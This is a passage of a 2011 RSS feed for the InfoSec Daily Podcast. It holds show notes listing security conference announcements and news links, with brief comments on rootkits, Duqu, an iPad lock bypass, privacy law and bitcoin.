	Where: Holiday Inn Airport, Nashville, TN
	http://www.skydogcon.com
	Phreaknic
	When: Nov 4th &#8211; Nov 6th
	Where: Days Inn Stadium, Nashville, TN
	http://www.phreaknic.info
	BSidesDFW 2011
	When: November 5th, 2011
	Where: Microsoft Technology Center Dallas
	http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011
	Cost = FREE
	2011 Fall Information Security Conference
	When: &#160;November 8 &#8211; 9, 2011
	Where: Atlanta, GA (Loudermilk Conference Center)
	http://www.gaissa.org
	BSides Delaware
	When: November 11-12, 2011
	Where: Wilmington University, Delaware Campus
	http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: http://pentest.cryptocity.net/careers
	Views on careers in information security careers based on the experience and your mileage may vary. The information below will be most appropriate if you live in New York City, you&#39;re interested in application security, pentesting, or reversing, and you are early on in your career in information security.
	Source: http://www.techdirt.com/articles/20111020/06093416431/hint-if-you-commit-crime-do-not-google-every-aspect-it-afterwards.shtml
	Techdirt has reported on a number people accused of murder googling for things like &#34;neck snap break&#34; or &#34;how to commit murder&#34; beforehand, and leaving these suggestive details on their computers. Those were some years back, and since then there has been plenty of attention given to the idea that your search histories provide a great deal of information about what you were thinking &#8211; and possibly even what you were thinking about doing.
	So you would expect people by now would have learned to be a little more cautious &#8211; for example, by carrying out searches anonymously at different Internet cafes. But the story of Vincent Tabak, whose case is currently going through UK courts, suggests that message still hasn&#39;t got across. The court has been hearing about his intensive use of the Internet to research a range of topics after killing a woman called Joanna Yeates (he admits manslaughter, but denies murder):
	The 33-year-old defendant &#8230; looked up satellite imagery of the site where he dumped Yeates&#39;s body. He researched the Wikipedia page for murder and maximum sentence for manslaughter, web records from work and personal laptops showed.
	While regularly checking the Avon and Somerset police website and local news site www.thisisbristol.co.uk, the Dutch engineer was also checking decomposition rates.
	Days after killing Yeates at her Clifton flat on 17 December, Tabak was watching a timelapse video of a body decomposing, Bristol [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 501 &#8211;  Weekly Wrap Up with Dr. B0nez</title>
		<link>http://www.isdpodcast.com/episode-501-weekly-wrap-up-with-dr-b0n3z</link>
		<comments>http://www.isdpodcast.com/episode-501-weekly-wrap-up-with-dr-b0n3z#comments</comments>
		<pubDate>Sun, 23 Oct 2011 08:34:21 +0000</pubDate>
		<dc:creator>Karthik.Rangarajan</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3001</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 501 for October 22, 2011. &#160;Tonight&#39;s podcast is hosted by Dr. Bonez, Boris Sverdlik (Live from Hack3rCon), and Geordy Rostad. Announcements: Hack3rCon 2011 When: October 21-23rd, 2011 Where: the Charleston House Hotel and Conference Center http://www.hack3rcon.org/ NordSec 2011 When: October 26&#8211;28, 2011 Where: Tallinn Science Park &#8220;Tehnopol&#8221;, Tallinn, Estonia http://nordsec2011.cyber.ee/ New [...]]]></description>
			<content:encoded><![CDATA[<p><span id="internal-source-marker_0.46237996144992743" style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 501 for October 22, 2011. &nbsp;Tonight&#39;s podcast is hosted by Dr. Bonez, Boris Sverdlik (Live from Hack3rCon), and Geordy Rostad.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hack3rCon 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 21-23rd, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: the Charleston House Hotel and Conference Center</span><br />
	<a href="http://www.hack3rcon.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.hack3rcon.org/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">NordSec 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 26&ndash;28, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Tallinn Science Park &ldquo;Tehnopol&rdquo;, Tallinn, Estonia</span><br />
	<a href="http://nordsec2011.cyber.ee/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nordsec2011.cyber.ee/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New Hampshire InfoSec Tweetup</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 29, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Pawtuckaway State Park in Nottingham, NH</span><br />
	<a href="http://nhinfosectweetup.eventbrite.com/%20"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nhinfosectweetup.eventbrite.com/ </span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">( It is just a gathering of security professionals and their families. &nbsp;No talks, just abunch of likeminded people and some good food.)</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BsidesATL 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 4th, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).</span></a><br />
	<a href="http://www.securitybsides.com/w/page/44893559/BSidesATL-2011"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/44893559/BSidesATL-2011</span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &nbsp;Of course all day Podcast Area.</span></p>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SkyDogCon</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Holiday Inn Airport, Nashville, TN</span><br />
	<a href="http://www.skydogcon.com/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Phreaknic</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Days Inn Stadium, Nashville, TN</span><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.phreaknic.info</span></a></p>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSidesDFW 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 5th, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Microsoft Technology Center Dallas</span></a><br />
	<a href="http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011<br class="kix-line-break" /><br />
	</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cost = FREE</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2011 Fall Information Security Conference</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 8 &#8211; 9, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA (Loudermilk Conference Center)<br class="kix-line-break" /><br />
	</span><a href="http://www.gaissa.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.gaissa.org</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Delaware</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 11-12, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Wilmington University, Delaware Campus</span><br />
	<a href="http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://securology.blogspot.com/2009/01/so-you-think-you-want-job-in-computer.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://securology.blogspot.com/2009/01/so-you-think-you-want-job-in-computer.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This story is from 2009 but we want to talk about it again to see how relevant it still is today or if it&rsquo;s just a bunch of FUD.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.h-online.com/open/news/item/Rapid7-announces-Community-Edition-of-Metasploit-1363434.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.h-online.com/open/news/item/Rapid7-announces-Community-Edition-of-Metasploit-1363434.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Rapid 7 offers up a community edition of Metasploit pro? &nbsp;Cool and confusing all at once.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.felipemartins.info/2011/08/security-and-hacking-complete-movie-list/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.felipemartins.info/2011/08/security-and-hacking-complete-movie-list/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This is the biggest list of movies hackers might enjoy that we&rsquo;ve ever seen and we&rsquo;ll talk about a few of our favorites.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://it.slashdot.org/story/11/10/21/2026242/most-sophisticated-rootkit-getting-an-overhaul"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://it.slashdot.org/story/11/10/21/2026242/most-sophisticated-rootkit-getting-an-overhaul</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The badguys are upgrading the code on TDL4 pushing towards a proper turnkey release.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://www.scmagazineus.com/duqu-underscores-trouble-av-industry-has-in-stopping-threats/article/214938/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.scmagazineus.com/duqu-underscores-trouble-av-industry-has-in-stopping-threats/article/214938/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Another nail in the coffin of signature-based antivirus. &nbsp;Duqu wasn&rsquo;t detected for months and clearly exposes the problem in using A/V as your one and only defense.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://techcrunch.com/2011/10/21/video-unlock-any-ipad-2-with-just-a-smart-cover-and-5-seconds/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://techcrunch.com/2011/10/21/video-unlock-any-ipad-2-with-just-a-smart-cover-and-5-seconds/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">More stupid Apple(security) tricks. &nbsp;This video shows you how to unlock an iPad 2 with the smart cover or any magnet.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.theregister.co.uk/2011/10/21/skype_bittorrent_stalking/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2011/10/21/skype_bittorrent_stalking/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Ceiling cat can see your torrents via Skype even when you aren&rsquo;t logged in!</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://t.co/MOEVaw4O"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://bit.ly/r5bBVe</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tell me Google, what&rsquo;s my IP address? &nbsp;You know everything else so surely this will be easy for you&#8230;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.feross.org/webcam-spy/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.feross.org/webcam-spy/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The reverse porno attack.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.msnbc.msn.com/id/44979692"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.msnbc.msn.com/id/44979692</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous finally takes on a cause that most of us can stand behind&#8230; &nbsp;Now combine this story with the last story and surely lulz would ensue.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.microsoft.com/security/sir/keyfindings/default.aspx#%21section_4_2"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.microsoft.com/security/sir/keyfindings/default.aspx#!section_4_2</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Newer operating systems are apparently getting infected less, so sayeth the Microsoft. </span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://yro.slashdot.org/story/11/10/18/1640219/feds-shy-away-from-raiding-email-without-warrant"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">yro.slashdot.org/story/11/10/18/1640219/feds-shy-away-from-raiding-email-without-warrant</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Good news about the 4th amendment thanks to a smiling Bob?</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.betabeat.com/2011/10/17/price-of-bitcoin-still-dropping-falls-below-the-price-of-mining/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.betabeat.com/2011/10/17/price-of-bitcoin-still-dropping-falls-below-the-price-of-mining/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Your bitcoins are worth less than the energy to mine them. &nbsp;Oh how the mighty have fallen. &nbsp;The forums are full of people trying to talk each other off the ledge&#8230;</span></p>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.zdnet.co.uk/blogs/security-bullet-in-10000166/akamai-cyber-spies-are-hiding-behind-anonymous-10024573/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.zdnet.co.uk/blogs/security-bullet-in-10000166/akamai-cyber-spies-are-hiding-behind-anonymous-10024573/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous is a great place to hide if you&rsquo;re a spy.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><br />
	<a href="http://www.wired.com/threatlevel/2011/10/ecpa-turns-twenty-five/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.wired.com/threatlevel/2011/10/ecpa-turns-twenty-five/</span></a><br />
	&nbsp;</p>
<h1 dir="ltr"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Aging &lsquo;Privacy&rsquo; Law Leaves Cloud E-Mail Open to Cops</span></h1>
<p>
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-501-weekly-wrap-up-with-dr-b0n3z/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3001/0/infosec-daily-podcast-episode501.mp3" length="197067754" type="audio/mpeg" />
		<itunes:duration>3:25:17</itunes:duration>
